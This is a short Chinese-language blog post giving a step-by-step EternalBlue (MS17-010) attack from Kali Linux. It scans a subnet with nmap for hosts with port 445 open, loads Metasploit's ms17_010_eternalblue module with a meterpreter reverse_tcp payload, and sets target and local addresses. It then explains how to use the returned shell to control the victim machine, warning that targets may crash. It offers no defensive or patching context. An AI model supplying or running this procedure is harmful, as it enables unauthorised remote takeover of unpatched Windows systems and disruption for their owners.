Kail下MS17-010漏洞利用

  • 内容
  • 相关

首先打开Kali(有些旧版的kali可能没有此模块,那就更新一下吧)

更新Kali的命令:apt-get updata

更新Kali的软件命令:apt-get upgrade

假如你的ip是:192.168.1.1,你就先在Kali输入nmap -sV 192.168.1.0/24,然后等显示结果,显示结果找有开启445端口的ip,就锁定他。

 
靶机

输入以下命令,注意:此攻击可能会导致电脑蓝屏或者卡死,但是有些电脑卡死一会就会恢复。

适用于windows7/2008 R2,ms17_010主动漏洞

msfconsole(启动模块)

use exploit/windows/smb/ms17_010_eternalblue(使用漏洞模块)

set payload windows/x64/meterpreter/reverse_tcp(使用payload)

 
使用模块和 payload

show options(查看需要填写的信息)

set rhost(被攻击机ip)

set lhost(本机ip)

 
输入需要的参数

exploit(溢出攻击)

 
溢出攻击

假如反弹了meterpreter命令行可以用meterpreter命令行执行命令控制对方了,也可以在在meterpreter命令行输入shell就可以执行cmd命令行的命令了(两个命令行的指令不一样的哦)

 
拿到权限

本文标签:

版权声明:若无特殊注明,本文皆为《凌云》原创,转载请保留文章出处。

本文链接:Kail下MS17-010漏洞利用 - https://blog.56jr.cn/WenZhang/150.html

发表评论

电子邮件地址不会被公开。 必填项已用*标注

未显示?请点击刷新

允许邮件通知

大家都在搜

00:00 / 00:00
顺序播放